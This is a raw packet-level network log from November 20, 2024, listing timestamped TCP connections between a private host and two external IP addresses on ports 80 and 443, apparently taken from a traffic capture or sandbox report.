                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.911434889 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.911495924 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.911511898 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.911546946 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.912322998 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.912373066 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.912394047 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.912424088 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.912448883 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.913165092 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.913218021 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.913233042 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.913280010 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.914071083 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.914146900 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.914161921 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.914190054 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.914201021 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.914881945 CET8049758185.215.113.16192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:48.970009089 CET4975880192.168.2.7185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.203464985 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.205869913 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.205894947 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.206393957 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.206398964 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.322423935 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.323645115 CET49770443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.323677063 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.324131012 CET49770443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.324136019 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.404330015 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.405359030 CET49771443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.405392885 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.405843973 CET49771443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.405849934 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.548923969 CET4434977313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.549604893 CET49773443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.549628973 CET4434977313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.550088882 CET49773443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.550093889 CET4434977313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.607299089 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.611712933 CET49772443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.611757040 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.612230062 CET49772443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.612237930 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.656850100 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.656927109 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.657008886 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.667289972 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.667331934 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.667351961 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.667359114 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.671850920 CET49774443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.671900988 CET4434977413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.671968937 CET49774443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.672756910 CET49774443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.672771931 CET4434977413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.775180101 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.775259972 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.775326014 CET49770443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.775564909 CET49770443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.775588036 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.775599957 CET49770443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.775604963 CET4434977013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.779088974 CET49775443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.779124022 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.779184103 CET49775443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.779412985 CET49775443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.779428959 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.840111971 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.840169907 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.840279102 CET49771443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.840522051 CET49771443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.840544939 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.840557098 CET49771443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.840563059 CET4434977113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.843569040 CET49776443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.843591928 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.843681097 CET49776443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.843817949 CET49776443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:49.843831062 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.060296059 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.060384989 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.060527086 CET49772443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.068290949 CET49772443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.068312883 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.068326950 CET49772443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.068334103 CET4434977213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.071615934 CET49777443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.071659088 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.071755886 CET49777443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.071891069 CET49777443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.071899891 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.101212025 CET4434977313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.101289988 CET4434977313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.101394892 CET49773443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.103976011 CET49773443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.103990078 CET4434977313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.103998899 CET49773443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.104003906 CET4434977313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.106931925 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.106988907 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.107074976 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.107228041 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:50.107240915 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.515628099 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.516381025 CET49775443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.516402960 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.516995907 CET49775443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.517000914 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.733722925 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.734323025 CET49776443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.734360933 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.734900951 CET49776443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.734909058 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.755917072 CET4434977413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.756700993 CET49774443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.756745100 CET4434977413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.757679939 CET49774443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.757694960 CET4434977413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.903281927 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.903876066 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.903892040 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.904481888 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.904486895 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.927172899 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.927825928 CET49777443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.927855968 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.928224087 CET49777443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.928230047 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.982708931 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.982790947 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.982906103 CET49775443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.983129025 CET49775443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.983138084 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.983150959 CET49775443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.983155966 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.986192942 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.986217022 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.986313105 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.986471891 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:51.986479998 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.181771040 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.181874037 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.181936026 CET49776443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.182229996 CET49776443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.182229996 CET49776443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.182255030 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.182265043 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.185046911 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.185074091 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.185158968 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.185329914 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.185340881 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.210032940 CET4434977413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.210197926 CET4434977413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.210390091 CET49774443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.210391045 CET49774443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.210391045 CET49774443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.212255001 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.212291956 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.212371111 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.212488890 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.212503910 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.356753111 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.356820107 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.356935978 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.357176065 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.357196093 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.357204914 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.357208967 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.359957933 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.359982014 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.360053062 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.360202074 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.360215902 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.381252050 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.381412029 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.381486893 CET49777443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.381513119 CET49777443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.381513119 CET49777443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.381525993 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.381535053 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.383404970 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.383501053 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.383584976 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.383816957 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.383857012 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.517002106 CET49774443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:52.517077923 CET4434977413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:53.711926937 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:53.766891003 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:53.778527021 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:53.778544903 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:53.779195070 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:53.779206991 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:53.976047039 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.006324053 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.016877890 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.048343897 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.049899101 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.049913883 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.050457954 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.050467968 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.060448885 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.060463905 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.060952902 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.060964108 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.144372940 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.156008005 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.156192064 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.156248093 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.188772917 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.216499090 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.216516018 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.217302084 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.217308998 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.218170881 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.218209028 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.218235016 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.218247890 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.271301985 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.313755989 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.420769930 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.420876026 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.420919895 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.436822891 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.436858892 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.437364101 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.437371016 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.450150013 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.450336933 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.450387001 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.450695038 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.450711012 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.450725079 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.450731039 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.459988117 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.459988117 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.460014105 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.460024118 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.467643023 CET49784443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.467677116 CET4434978413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.467741013 CET49784443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.482419014 CET49785443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.482486963 CET4434978513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.482553005 CET49785443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.483985901 CET49784443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.484003067 CET4434978413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.491877079 CET49785443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.491893053 CET4434978513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.618506908 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.618570089 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.618616104 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.630678892 CET49786443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.630698919 CET4434978613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.630759954 CET49786443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.647934914 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.647958994 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.647972107 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.647977114 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.651948929 CET49787443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.652034044 CET4434978713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.652101994 CET49787443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.666379929 CET49786443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.666393042 CET4434978613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.669118881 CET49787443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.669164896 CET4434978713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.757051945 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.757129908 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.757195950 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.788882971 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.788882971 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.788955927 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.788984060 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.810558081 CET49792443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.810570002 CET4434979213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.810627937 CET49792443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.811461926 CET49792443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.811474085 CET4434979213.107.246.63192.168.2.7
